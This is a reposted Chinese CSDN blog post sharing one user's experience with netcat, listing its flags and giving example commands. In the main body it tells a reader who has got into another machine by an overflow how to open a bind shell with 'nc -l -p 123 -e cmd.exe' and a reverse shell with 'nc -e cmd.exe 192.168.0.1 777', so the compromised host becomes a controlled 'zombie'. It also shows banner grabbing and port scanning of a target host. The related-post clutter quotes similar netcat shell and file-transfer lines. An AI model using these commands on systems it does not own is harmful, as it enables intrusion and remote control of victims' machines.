[黑客必看]我用NC的心得

最新推荐文章于 2024-04-19 16:00:00 发布
最新推荐文章于 2024-04-19 16:00:00 发布
阅读量854 收藏
点赞数
分类专栏: 网络技术-安 全 【创作类型:转载】 文章标签: shell iis cmd tcp c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lwglucky/article/details/5327202
版权

参数解释:
-e 程序重定向
-t 用telnet来回应
-l 监听本地端口
-p 指定本地端口
-v 获得端口信息
-vv 获得详细的端口信息
-z 关闭输入输出
-n 指定IP地址
-w 设定超时时间
-u UDP端口
我就知道这么些参数 了:
第一个:
nc -l -v -p 7626
这就是打开本地的7626端口进行监听,并反馈连接信息这样如果有扫描冰河木马的人会认为你中了木马开放了7626,和“小猪快跑”的功能有点象,再加个批处理文件一起用的话就是一个“小猪快跑”了.
如果要监视是否有入侵本地80端口的行为,并记下来,用这个命令:
nc -l -p 80 >>c://日志.dat
这样,凡是有针对本机80端口的攻击都会被记录下来的.
二、
如果你通过溢出进入了别人的机器,就可以运行:
nc -l -p 123 -e cmd.exe
或者是: nc -l -p 123 -t
作用都是以cmd.exe来响应到机器上123端口的连接.
这样就把溢出的主机变成了一台telnet肉鸡了!
你也可一用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1 .
在肉鸡上运行: nc -e cmd.exe 192.168.0.1 777
再在本地机器上运行: nc -l -p 777
意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口。
你再在本地机上监听777端口,这样就进入了对方的cmd了。
这也微十时毫 反弹端口式木马的原理了。
三、
用这个命令:
nc -v 192.168.0.25 80
就获得了192.168.0.25的80端口的信息。
可以获得IIS版本等很多重要信息 的 。
四、
你也可以将NC作为扫描器使用:
nc -v -z 192.168.0.25 1-100
扫描192.168.0.25的1到100间的TCP端口
用nc -v -z -u 192.168.0.25 1-100
这是扫描1到00间的UDP端口。
这些就是我这几天悟出来的。
大家还有心得什么没有啊!

lwglucky
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nc个人实战使用总结
墨痕诉清风的博客
09-15 1029
pop3和smtp连接使用 pop3:nc -vn ***.***.***.*** 110 账户需要base64编码 smtp:nc-vn ***.***.***.*** 110 直接输入账户 远程将客户端进程输入到服务端ps.txt 服务端:nc -l -p 333 > ps.txt 客户端:ps aux | nc -nv 10.1.1.12 333 -q 1 ......
[***必看]我用NC心得
weixin_34121304的博客
03-29 163
  参数解释:   -e 程序重定向   -t 用telnet来回应   -l  监听本地端口   -p  指定本地端口   -v  获得端口信息   -vv  获得详细的端口信息   -z  关闭输入输出   -n  指定IP地址   -w 设定超时时间   -u  UDP端口   我就知道这么些参数 了:   第一个:   nc -l -v -p 7626   这就是打开...
黑客工具NC的使用教程
12-23
黑客工具NC的使用教程,其中包含了黑客工具的使用和其功能。
黑客必备,瑞士军刀-nc 使用(一)
要不,单步调试走起?
10-18 1995
下了个nc,竟然不知道是命令行下运行,发现还是一点击输入指令就消失,还以为是杀软的事,边骂边把杀软关掉,没想到是命令行下。。囧,我太弱了。 ========================================================= 1.当客户端使用 nc www.xxx.com 80 其中 www.xxx.com 是主机名,80是端口,例如某个服务器主机是127.0
黑客必备:NC综合漏洞利用工具
最新发布
logic1001的博客
04-19 857
NC综合漏洞利用工具的设计旨在简化授权项目中繁琐的步骤,并解决市面上用友NC系列漏洞工具存在的问题。目前,该工具具备以下8个主要功能:支持自定义生成脏数据序列化Payload支持命令执行支持文件上传支持注入内存马支持自定义字节码注入支持目录浏览支持4种数据库解密当选择不同漏洞类型的时候,UI会自动隐藏不适合该漏洞功能显示适合的漏洞功能。支持17种漏洞检测支持DNSLog检测支持漏洞接口检测未配置DNSLog: 只进行接口检查。配置DNSLog: 则进行DNSLog(任何DNSLog。
黑客学习必看
08-18
黑客新手学习必看 看到不少刚入门的菜鸟找不到适合自己的hack学习方法,到处碰壁,不但损伤信心和兴趣,而且也耽误了不少高贵的时间和金钱,做了许多无用功,到头来毫无收获。 因此我总结了一下我个人的一些学习...
网络雷达.查黑客木马必备软件
12-19
黑客木马必备软件 上网时,就怕黑客。...黑客和木马都要使用网络连接。点开这个软件,所有连接一目了然。如果怀疑有黑客,关掉所有软件,点开雷达查查;下载的新软件是否有木马,看看是否有网络连接。
黑客入门的必备工具
02-08
这里是我搜集的一些基本的黑客入门的实用工具,对于那些像我一样的菜鸟们很有用的~因为不用在一个一个搜集加壳,免杀~~~~等的工具了,你想要的这里基本都有哦!
学习网络安全、黑客攻防必看!.url
10-15
学习网络安全、黑客攻防必看!.url
CTF 题型了解
qq_58148144的博客
03-12 898
下一个成功的就是你 Web Web类题目大部分情况下和网、Web、HTTP等相关技能有关。主要考察选手对于Web攻防的一些知识技巧。诸如SQL注入、XSS、代码执行、代码审计等等都是很常见的考点。一般情况下Web题目只会给出一个能够访问的URL。部分题目会给出附件 Pwn Pwn类题目重点考察选手对于二进制漏洞的挖掘和利用能力,其考点也通常在堆栈溢出、格式化漏洞、UAF、Double Free等常见二进制漏洞上。选手需要根据题目中给出的二进制可执行文件进行逆向分析,找出其中的漏洞并进行利用,编...
CTF-BUUCTF-Pwn-test_your_nc
qq_42404383的博客
12-19 1万+
CTF-BUUCTF-Pwn-test_your_nc 题目: 解题思路及知识考查: 思路:根据提示,直接NC即可 NC:的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等。 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数&g...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3069
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
ctfshow-Crypto-红包4(nc连接)
ZBDX2113的博客
04-30 1299
from secrets import randbelow from nationalsecret import p, r, k, flag g = 2 y = pow(g, k, p) def dododo(): print("Here is my gift for National's Day!") t = pow(g, r, p) print(f't = {t}') print("What do you want?") c = int(input('c =.
【Pwn | CTF】BUUCTF test_your_nc1
weixin_46301214的博客
01-31 714
nc命令是一个用于网络通信的命令行工具,全称为netcat。以上是nc命令的一些常用用法和参数,需要注意的是,nc命令在不同的操作系统上可能会有一些差异。还记得我以前第一次做pwn题目的时候,是真的懵逼,连接上之后没反应。这题直接连接就可以了,windows装了nc工具,直接耍。这里光标去了下一行,是已经连接上,在等你输入命令呢。下面给一点nc命令的解释,文心一言得出来的。天命:时隔两年,又杀回了pwn这里。然后正常查看 flag 文件就行了。拿到题目的提示,测试你的nc工具。
渗透神器系列】nc
lansefly1990的专栏
12-21 1112
【渗透神器系列】nc 发表于 2017-04-10   |   分类于 安全工具   |   热度 3125 ℃   工欲善其事,必先利其器   从事渗透测试工作几年了,在做项目过程中发现良好的渗透技术固然重要,但欲测试出更多的结果,离不开强大的工具。即使是能力超强的大牛,我想也不可能完全手工做渗透,毕竟渗透测试还是个体力活。   现在有些人认为渗透测试越来越简单了,因为开源的自动化工具...
NC工具的使用说明教程
热门推荐
xysoul的专栏
08-21 8万+
nc的使用方法 netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。  在中国,它
nc的基础使用
L1928的博客
08-31 515
1.Nc之间的通讯: 主机A nc端输入:nc -l -p 333 (-l 处于监听状态,也就是监听333 端口 老版本需要加-p参数) 主机B nc 端输入:nc -nv 192.168.1.3 333 (此处ip为主机A的ip建立连接 n表示不要使用DNS 反向查询ip地址的域名 v 表示详细输出) 2.Nc 之间传输文件 主机A nc 发送端输入 nc -l -p 9992 < 1.txt 主机B nc 下载端输入 nc 192.168.110.1 9992 > 1.txt 3.NC 反弹
netcat使用总结
 
08-30 1万+
第一次知道nc(netcat)是好几年前的事了,那个时候天比现在更蓝,草比现在更绿,卤煮也还是一个刚上大学不久的青葱骚年... 现在把这个01年的老古董拿出来说好像有点炒冷饭的意思,资料也铺天盖地了说多了还惹人嫌。 不过没办法啊,毕竟当卤煮逐渐发现它有许多颇有内涵的功能的时候,连小伙伴都让它给惊呆了 :D ... 由于对hacker文化的兴趣,顺理成章的在合适的时候发现了nc,但当时
NetCat(NC)在渗透测试中的常见应用以及中文版参数解释
Hvnt3r的博客
03-21 4150
NetCat简称NC,是一款体积小巧但功能十分强大的网络工具,享有网络工具中的“瑞士军刀”之称,深得网络安全从业者的喜爱,在此我总结以下NetCat在渗透测试和部分其他情景下的使用方法:1.作为文本传输工具2.作为文件的传输工具3.加密传输文件4.加密数据流量5.远程克隆硬盘6.作为木马进行远程控制7.作为流媒体服务器参数中文对照-d 后台模式-e prog 程序重定向,一旦连接,就执行 [危险!...
DOS操作系统入门教程_黑客必备知识
同时,文档还提到了批处理文件的使用,对于想要了解DOS操作系统的初学者或者黑客来说,是一份重要的参考资料。" 在计算机操作系统的历史上,DOS(Disk Operating System)曾扮演着至关重要的角色。在1995年Windows ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值